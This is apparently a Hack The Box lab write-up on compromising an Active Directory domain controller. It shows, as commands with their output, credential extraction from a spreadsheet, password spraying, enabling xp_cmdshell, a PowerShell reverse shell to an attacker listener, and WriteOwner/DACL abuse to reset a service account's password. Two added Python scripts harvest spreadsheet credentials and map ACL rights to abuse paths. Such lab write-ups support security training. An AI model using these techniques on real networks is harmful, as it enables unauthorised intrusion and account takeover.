HTB — EscapeTwo
MSSQL with xp_cmdshell after credential spraying. ADCS ESC4 template modification for certificate impersonation to gain Domain Admin.
As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su
nmap
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 00:00 EST
Nmap scan report for 10.10.11.51
Host is up (0.021s latency).
Not shown: 65509 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-13 05:01:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T05:03:20+00:00; +1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T05:03:20+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.51:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-01-13T05:03:20+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-13T04:15:16
|_Not valid after: 2055-01-13T04:15:16
| ms-sql-info:
| 10.10.11.51:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T05:03:20+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T05:03:20+00:00; +1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49684/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49689/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49737/tcp open msrpc Microsoft Windows RPC
49801/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-01-13T05:02:43
|_ start_date: N/A
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 18.33 ms 10.10.14.1
2 18.81 ms 10.10.11.51

445/tcp open microsoft-ds?
smbclient -L \\\\10.10.11.51 -U "sequel.htb/rose"
Password for [SEQUEL.HTB\rose]:
Sharename Type Comment
--------- ---- -------
Accounting Department Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.51 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

The non-default shares are Accounting Department and Users. Pull the spreadsheets from the first one:
smbclient \\\\10.10.11.51\\"Accounting Department" -U "sequel.htb/rose"
Password for [SEQUEL.HTB\rose]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jun 9 06:52:21 2024
.. D 0 Sun Jun 9 06:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 06:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 06:52:07 2024
smb: \> get accounts.xlsx
smb: \> get accounting_2024.xlsx

users
nxc smb 10.10.11.51 -u rose -p 'KxEPkKe6R8su' --users
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.10.11.51 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.51 445 DC01 Administrator 2024-06-08 16:32:20 0 Built-in account for administering the computer/domain
SMB 10.10.11.51 445 DC01 Guest 2024-12-25 14:44:53 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.51 445 DC01 krbtgt 2024-06-08 16:40:23 0 Key Distribution Center Service Account
SMB 10.10.11.51 445 DC01 michael 2024-06-08 16:47:37 0
SMB 10.10.11.51 445 DC01 ryan 2024-06-08 16:55:45 0
SMB 10.10.11.51 445 DC01 oscar 2024-06-08 16:56:36 0
SMB 10.10.11.51 445 DC01 sql_svc 2024-06-09 07:58:42 0
SMB 10.10.11.51 445 DC01 rose 2024-12-25 14:44:54 0
SMB 10.10.11.51 445 DC01 ca_svc 2025-01-13 13:57:29 0
SMB 10.10.11.51 445 DC01 [*] Enumerated 9 local users: SEQUEL

bloodhound
sudo bloodhound-python -u 'rose' -p 'KxEPkKe6R8su' -ns 10.10.11.51 -d sequel.htb -c all
zip -r sequel.htb.zip *.json
Queries checked in the BloodHound GUI after importing the zip: kerberoastable users, ACL abuse (outbound object control from the owned accounts), and all computers.

kerberoastable
GetUserSPNs.py -dc-ip 10.10.11.51 sequel.htb/rose -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------- ------- ---------------------------------------------------- -------------------------- -------------------------- ----------
sequel.htb/sql_svc.DC01 sql_svc CN=SQLRUserGroupSQLEXPRESS,CN=Users,DC=sequel,DC=htb 2024-06-09 03:58:42.689521 2025-01-12 23:15:09.814500
sequel.htb/ca_svc.DC01 ca_svc CN=Cert Publishers,CN=Users,DC=sequel,DC=htb 2025-01-13 11:42:29.522032 2025-01-13 00:14:18.006496
[-] CCache file is not found. Skipping...
$krb5tgs$23$*sql_svc$SEQUEL.HTB$sequel.htb/sql_svc*$6edc7db2...$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
$krb5tgs$23$*ca_svc$SEQUEL.HTB$sequel.htb/ca_svc*$6b0d1758...$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
No crack of either TGS hash is recorded here; the way in was the spreadsheet from the Accounting Department share.

accounts.xlsx
An .xlsx file is a zip archive. Rename it to .zip (or unzip it as-is) and xl/sharedStrings.xml holds every distinct text cell of the workbook in cleartext, password column included:
cat sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24"><si><t xml:space="preserve">First Name</t></si><si><t xml:space="preserve">Last Name</t></si><si><t xml:space="preserve">Email</t></si><si><t xml:space="preserve">Username</t></si><si><t xml:space="preserve">Password</t></si><si><t xml:space="preserve">Angela</t></si><si><t xml:space="preserve">Martin</t></si><si><t xml:space="preserve">angela@sequel.htb</t></si><si><t xml:space="preserve">angela</t></si><si><t xml:space="preserve">0fwz7Q4mSpurIt99</t></si><si><t xml:space="preserve">Oscar</t></si><si><t xml:space="preserve">Martinez</t></si><si><t xml:space="preserve">oscar@sequel.htb</t></si><si><t xml:space="preserve">oscar</t></si><si><t xml:space="preserve">86LxLBMgEWaKUnBG</t></si><si><t xml:space="preserve">Kevin</t></si><si><t xml:space="preserve">Malone</t></si><si><t xml:space="preserve">kevin@sequel.htb</t></si><si><t xml:space="preserve">kevin</t></si><si><t xml:space="preserve">Md9Wlq1E5bZnVDVo</t></si><si><t xml:space="preserve">NULL</t></si><si><t xml:space="preserve">sa@sequel.htb</t></si><si><t xml:space="preserve">sa</t></si><si><t xml:space="preserve">MSSQLP@ssw0rd!</t></si></sst>

Read in order, the strings give back the sheet:
First Name  Last Name  Email              Username  Password
Angela      Martin     angela@sequel.htb  angela    0fwz7Q4mSpurIt99
Oscar       Martinez   oscar@sequel.htb   oscar     86LxLBMgEWaKUnBG
Kevin       Malone     kevin@sequel.htb   kevin     Md9Wlq1E5bZnVDVo
NULL        NULL       sa@sequel.htb      sa        MSSQLP@ssw0rd!
Caveat: sharedStrings.xml is deduplicated (count="25" cells but uniqueCount="24", so one string is reused, evidently NULL for both name cells of the sa row). A flat read only lines up with the columns while no value repeats; the exact cell layout lives in xl/worksheets/sheet1.xml, which references this table by index.

password spray
angela and kevin do not exist in the domain (see the --users list), so spray the sheet passwords across the enumerated users:
nxc smb 10.10.11.51 -u users.txt -p passwords.txt --continue-on-success
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [-] sequel.htb\Administrator:0fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\michael:0fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\ryan:0fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\oscar:0fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\sql_svc:0fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\ca_svc:0fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\rose:0fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\Administrator:86LxLBMgEWaKUnBG STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\michael:86LxLBMgEWaKUnBG STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\ryan:86LxLBMgEWaKUnBG STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [+] sequel.htb\oscar:86LxLBMgEWaKUnBG valid creds
oscar:86LxLBMgEWaKUnBG

sa is a SQL Server login, not a domain account, so test it against MSSQL with --local-auth:
nxc mssql 10.10.11.51 -u sa -p 'MSSQLP@ssw0rd!' --local-auth
MSSQL 10.10.11.51 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL 10.10.11.51 1433 DC01 [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
sa:sequel.htb:MSSQLP@ssw0rd!
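As an added example (not from the writeup), here is a small Python reader that does what the unzip-and-cat step does properly: it resolves the sheet's cell references against the shared-string table, so repeated values do not shift columns, and pairs the Username and Password columns by header rather than by position. The workbook it parses is constructed in memory to mirror the sheet above (with an extra Role column whose value repeats, to show the dedup problem); pass the bytes of a real .xlsx to extract_credentials for the real thing.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS = {"m": MAIN_NS}

# Constructed sample: a Username / Password / Role sheet built in memory so the example runs
# offline. "user" repeats in the Role column, so the shared-string table holds 10 unique
# strings for 12 cells, which is exactly what breaks a top-to-bottom read of sharedStrings.xml.
SAMPLE_SHARED_STRINGS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<sst xmlns="{MAIN_NS}" count="12" uniqueCount="10">'
    "<si><t>Username</t></si><si><t>Password</t></si><si><t>Role</t></si>"
    "<si><t>angela</t></si><si><t>0fwz7Q4mSpurIt99</t></si><si><t>user</t></si>"
    "<si><t>oscar</t></si><si><t>86LxLBMgEWaKUnBG</t></si>"
    "<si><t>sa</t></si><si><t>MSSQLP@ssw0rd!</t></si>"
    "</sst>"
)
SAMPLE_SHEET = (
    f'<worksheet xmlns="{MAIN_NS}"><sheetData>'
    '<row r="1"><c r="A1" t="s"><v>0</v></c><c r="B1" t="s"><v>1</v></c><c r="C1" t="s"><v>2</v></c></row>'
    '<row r="2"><c r="A2" t="s"><v>3</v></c><c r="B2" t="s"><v>4</v></c><c r="C2" t="s"><v>5</v></c></row>'
    '<row r="3"><c r="A3" t="s"><v>6</v></c><c r="B3" t="s"><v>7</v></c><c r="C3" t="s"><v>5</v></c></row>'
    '<row r="4"><c r="A4" t="s"><v>8</v></c><c r="B4" t="s"><v>9</v></c><c r="C4" t="s"><v>5</v></c></row>'
    "</sheetData></worksheet>"
)


def build_sample_xlsx() -> bytes:
    """Zip only the two parts a reader needs; a real .xlsx has more parts, none needed here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/sharedStrings.xml", SAMPLE_SHARED_STRINGS)
        z.writestr("xl/worksheets/sheet1.xml", SAMPLE_SHEET)
    return buf.getvalue()


def shared_strings(xlsx: bytes) -> list[str]:
    """The deduplicated string table in index order (what `cat sharedStrings.xml` shows)."""
    with zipfile.ZipFile(io.BytesIO(xlsx)) as z:
        root = ET.fromstring(z.read("xl/sharedStrings.xml"))
    # rich-text cells split their text over several <r><t> runs: join every <t> under the <si>
    return ["".join(t.text or "" for t in si.iter(f"{{{MAIN_NS}}}t")) for si in root.findall("m:si", NS)]


def read_rows(xlsx: bytes, sheet: str = "xl/worksheets/sheet1.xml") -> list[dict[str, str]]:
    """Resolve every cell of the sheet to its text, keyed by column letter, one dict per row."""
    sst = shared_strings(xlsx)
    with zipfile.ZipFile(io.BytesIO(xlsx)) as z:
        root = ET.fromstring(z.read(sheet))
    rows = []
    for row in root.iter(f"{{{MAIN_NS}}}row"):
        cells = {}
        for c in row.findall("m:c", NS):
            col = re.match(r"[A-Z]+", c.get("r")).group(0)
            kind = c.get("t")
            if kind == "s":                      # index into the shared-string table
                cells[col] = sst[int(c.find("m:v", NS).text)]
            elif kind == "inlineStr":            # text stored inside the cell itself
                cells[col] = "".join(t.text or "" for t in c.iter(f"{{{MAIN_NS}}}t"))
            elif c.find("m:v", NS) is not None:  # numbers, booleans, formula results
                cells[col] = c.find("m:v", NS).text
        rows.append(cells)
    return rows


def extract_credentials(xlsx: bytes) -> list[tuple[str, str]]:
    """Pair the Username and Password columns using the header row, whatever order the columns are in."""
    rows = read_rows(xlsx)
    if not rows:
        return []
    header = {name.strip().lower(): col for col, name in rows[0].items()}
    user_col = header.get("username") or header.get("user") or header.get("login")
    pass_col = header.get("password") or header.get("pass")
    if not user_col or not pass_col:
        return []
    return [(r[user_col], r[pass_col]) for r in rows[1:] if r.get(user_col) and r.get(pass_col)]


if __name__ == "__main__":
    sample = build_sample_xlsx()
    print(f"{len(shared_strings(sample))} unique strings for {sum(len(r) for r in read_rows(sample))} cells")
    for user, pwd in extract_credentials(sample):
        print(f"{user}:{pwd}")
```

The user:password lines it prints drop straight into a spray list. Cells with t="s" are the ones that land in sharedStrings.xml; cells written as inline strings or numbers never appear there, which is another reason to read the sheet rather than only the string table.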
1433/tcp open ms-sql-s
impacket-mssqlclient authenticates as a SQL login unless -windows-auth is given, so the domain prefix here is ignored and sa logs in with the password from the sheet:
impacket-mssqlclient sequel.htb/sa:'MSSQLP@ssw0rd!'@10.10.11.51
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa dbo@master)> SELECT name FROM master.dbo.sysdatabases
name
------
master
tempdb
model
msdb
enable xp_cmdshell
Only the four default databases exist, so go straight for command execution. xp_cmdshell is off by default; turning it on needs sysadmin (sa has it) and a RECONFIGURE after each sp_configure call:
SQL (sa dbo@master)> EXECUTE sp_configure 'show advanced options', 1
SQL (sa dbo@master)> reconfigure
SQL (sa dbo@master)> EXECUTE sp_configure 'xp_cmdshell', 1
SQL (sa dbo@master)> reconfigure
SQL (sa dbo@master)> EXECUTE xp_cmdshell 'whoami'
output
--------------
sequel\sql_svc
NULL

Reverse shell through xp_cmdshell (base64-encoded PowerShell one-liner, listener on 10.10.14.6:1234):
SQL (sa dbo@master)> EXECUTE xp_cmdshell 'powershell -e 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'

nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.51] 57186
PS C:\Windows\system32> whoami
sequel\sql_svc

The SQL Server unattended-install answer file is still on disk and carries both the service account password and the sa password in cleartext:
PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True

reuse password
SQLSVCPASSWORD is the password of the sql_svc domain account (the account xp_cmdshell runs as). Spray it across the user list for reuse:
nxc smb 10.10.11.51 -u users.txt -p 'WqSZAF6CysDQbGb3' --continue-on-success
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [-] sequel.htb\Administrator:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\michael:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
SMB 10.10.11.51 445 DC01 [-] sequel.htb\oscar:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [+] sequel.htb\sql_svc:WqSZAF6CysDQbGb3
SMB 10.10.11.51 445 DC01 [-] sequel.htb\ca_svc:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\rose:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
ryan reuses the sql_svc password, and WinRM (5985) is open.

ryan: user.txt
evil-winrm -i 10.10.11.51 -u ryan -p 'WqSZAF6CysDQbGb3'
*Evil-WinRM* PS C:\Users\ryan\desktop> cat user.txt
2033c4d1...

WriteOwner to CA_SVC
BloodHound shows ryan has WriteOwner over the ca_svc user object (its owner at this point is Domain Admins, as the owneredit.py output further down confirms). Owning the object lets ryan rewrite its DACL, grant himself GenericAll, and then reset the password.

*Evil-WinRM* PS C:\Users\ryan> upload /opt/windows/PowerView.ps1
*Evil-WinRM* PS C:\Users\ryan> Import-Module .\PowerView.ps1

force change password (PowerView)
$SecPassword = ConvertTo-SecureString 'WqSZAF6CysDQbGb3' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('sequel.htb\ryan', $SecPassword)
*Evil-WinRM* PS C:\Users\ryan> Set-DomainObjectOwner -Identity 'ca_svc' -OwnerIdentity "ryan" -Credential $Cred
*Evil-WinRM* PS C:\Users\ryan> Add-DomainObjectAcl -Rights 'All' -TargetIdentity "ca_svc" -PrincipalIdentity "ryan"
*Evil-WinRM* PS C:\Users\ryan> Get-DomainUser | Where-Object { $_.Name -like "*ryan*" } | Select-Object Name, Objectsid
name objectsid
---- ---------
Ryan Howard S-1-5-21-548670397-972687484-3496335370-1114

Confirm the ACE landed (SecurityIdentifier ...-1114 is ryan, ObjectSID ...-1607 is ca_svc):
Get-DomainObjectAcl -Identity 'ca_svc' | Where-Object { $_.ActiveDirectoryRights -eq 'GenericAll' }
ObjectDN : CN=Certification Authority,CN=Users,DC=sequel,DC=htb
ObjectSID : S-1-5-21-548670397-972687484-3496335370-1607
ActiveDirectoryRights : GenericAll
BinaryLength : 36
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 983551
SecurityIdentifier : S-1-5-21-548670397-972687484-3496335370-1114
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

With GenericAll in place, reset the ca_svc password:
$SecPassword = ConvertTo-SecureString 'WqSZAF6CysDQbGb3' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('sequel.htb\ryan', $SecPassword)
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity ca_svc -AccountPassword $UserPassword -Credential $Cred

AutoLogon check (output fragment):
Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : SEQUEL
DefaultUserName : Administrator

The same chain from Linux with Impacket, which is the route that worked (it had to be run multiple times):
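An added example, not part of the writeup: a Python decoder for the AccessMask numbers PowerView prints, so an ACE can be read without trusting the ActiveDirectoryRights label, together with the abuse primitive each right gives on a user object. The sample input is the ryan ACE from the output above, with two constructed ACEs added for contrast: a WriteOwner-only grant (what BloodHound reported ryan starting with) and a GenericWrite grant on a made-up user.

```python
import re

# ADS_RIGHTS_ENUM bit values (Windows SDK, iads.h); PowerView's ActiveDirectoryRights
# column is the .NET rendering of exactly these bits.
ADS_RIGHTS = {
    "CreateChild": 0x00000001, "DeleteChild": 0x00000002, "ListChildren": 0x00000004,
    "Self": 0x00000008, "ReadProperty": 0x00000010, "WriteProperty": 0x00000020,
    "DeleteTree": 0x00000040, "ListObject": 0x00000080, "ExtendedRight": 0x00000100,
    "Delete": 0x00010000, "ReadControl": 0x00020000, "WriteDacl": 0x00040000,
    "WriteOwner": 0x00080000,
}
# .NET System.DirectoryServices.ActiveDirectoryRights composite values, as they look once a
# stored ACE has had its generic bits mapped to specific rights.
COMPOSITE = {
    "GenericAll": 0x000F01FF,      # 983551, the AccessMask in the PowerView output above
    "GenericWrite": 0x00020028,    # ReadControl | Self | WriteProperty
    "GenericRead": 0x00020094,     # ReadControl | ReadProperty | ListChildren | ListObject
    "GenericExecute": 0x00020004,  # ReadControl | ListChildren
}
# What each right buys an attacker on a user object. WriteProperty and ExtendedRight depend on
# the ObjectAceType GUID, which a bare AccessMask does not carry, hence "check the GUID".
ABUSE = {
    "GenericAll": "full control: reset password, write any attribute, rewrite DACL and owner",
    "WriteOwner": "take ownership, then grant yourself WriteDacl / GenericAll",
    "WriteDacl": "add an ACE granting yourself GenericAll",
    "GenericWrite": "write attributes (servicePrincipalName for targeted Kerberoast, msDS-KeyCredentialLink for shadow credentials)",
    "WriteProperty": "attribute write; check the ObjectAceType GUID for which property",
    "ExtendedRight": "control access right; check the GUID (User-Force-Change-Password is one of them)",
}


def decode_mask(mask: int) -> list[str]:
    """Render an AccessMask roughly as ActiveDirectoryRights.ToString() does: composites first, then leftovers."""
    names, covered = [], 0
    for name, bits in COMPOSITE.items():
        if mask & bits == bits:
            names.append(name)
            covered |= bits
    if "GenericAll" in names:
        return ["GenericAll"]  # every other composite is a subset of it
    for name, bits in ADS_RIGHTS.items():
        if mask & bits and not covered & bits:
            names.append(name)
    return names


def abuse_paths(mask: int) -> dict[str, str]:
    """The rights in the mask that hand an attacker a known primitive, with what it yields."""
    return {name: ABUSE[name] for name in decode_mask(mask) if name in ABUSE}


def parse_powerview_aces(text: str) -> list[dict]:
    """Parse the `Key : Value` blocks Get-DomainObjectAcl prints (a blank line separates ACEs)."""
    aces = []
    for block in re.split(r"\n\s*\n", text.strip()):
        ace = {}
        for line in block.splitlines():
            m = re.match(r"\s*(\w+)\s*:\s*(.*)", line)
            if m:
                ace[m.group(1)] = m.group(2).strip()
        if "AccessMask" in ace:
            ace["AccessMask"] = int(ace["AccessMask"])
            ace["Rights"] = decode_mask(ace["AccessMask"])
            aces.append(ace)
    return aces


# Constructed sample: the ryan ACE from the PowerView output above (mask 983551 on ca_svc),
# then a WriteOwner-only ACE (524288) and a GenericWrite ACE (131112) made up for contrast.
SAMPLE = """
ObjectDN              : CN=Certification Authority,CN=Users,DC=sequel,DC=htb
ObjectSID             : S-1-5-21-548670397-972687484-3496335370-1607
AccessMask            : 983551
SecurityIdentifier    : S-1-5-21-548670397-972687484-3496335370-1114
AceType               : AccessAllowed

ObjectDN              : CN=Certification Authority,CN=Users,DC=sequel,DC=htb
ObjectSID             : S-1-5-21-548670397-972687484-3496335370-1607
AccessMask            : 524288
SecurityIdentifier    : S-1-5-21-548670397-972687484-3496335370-1114
AceType               : AccessAllowed

ObjectDN              : CN=Some Other User,CN=Users,DC=sequel,DC=htb
ObjectSID             : S-1-5-21-548670397-972687484-3496335370-9999
AccessMask            : 131112
SecurityIdentifier    : S-1-5-21-548670397-972687484-3496335370-1114
AceType               : AccessAllowed
"""

if __name__ == "__main__":
    for ace in parse_powerview_aces(SAMPLE):
        print(ace["SecurityIdentifier"], "->", ace["ObjectDN"], ace["Rights"])
        for right, what in abuse_paths(ace["AccessMask"]).items():
            print("   ", right + ":", what)
```

The Deny/Allow distinction (AceType) and inheritance flags still matter when reading a real DACL: a Deny ACE with the same mask takes away rights rather than granting them, and this decoder only interprets the mask.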
owneredit.py -action write -new-owner 'ryan' -target 'ca_svc' SEQUEL/ryan:WqSZAF6CysDQbGb3 -dc-ip 10.10.11.51
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-548670397-972687484-3496335370-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=sequel,DC=htb
[*] OwnerSid modified successfully!

dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'SEQUEL.HTB'/'ryan':'WqSZAF6CysDQbGb3'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250113-180329.bak
[*] DACL modified successfully!
dacledit backs the original DACL up to the .bak file shown; restore it with -action restore -file <bak> once done.

net rpc password "ca_svc" 'ThisIsStrong123!..' -U "ryan"%"WqSZAF6CysDQbGb3" -S "10.10.11.51"
nxc smb 10.10.11.51 -u ca_svc -p 'ThisIsStrong123!..'
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [+] sequel.htb\ca_svc:ThisIsStrong123!.. 
*Evil-WinRM* PS C:\Users\ryan> upload /opt/windows/Certify.exe
*Evil-WinRM* PS C:\users\ryan> net user CA_SVC 'ThisIsStrong123!..'

enumerating vulnerable CA templates
ca_svc is a member of Cert Publishers (see the GetUserSPNs output), which is why it matters for the templates. Certify, run from the ryan session:
*Evil-WinRM* PS C:\users\ryan> .\certify.exe find /vulnerable
_____ _ _ __
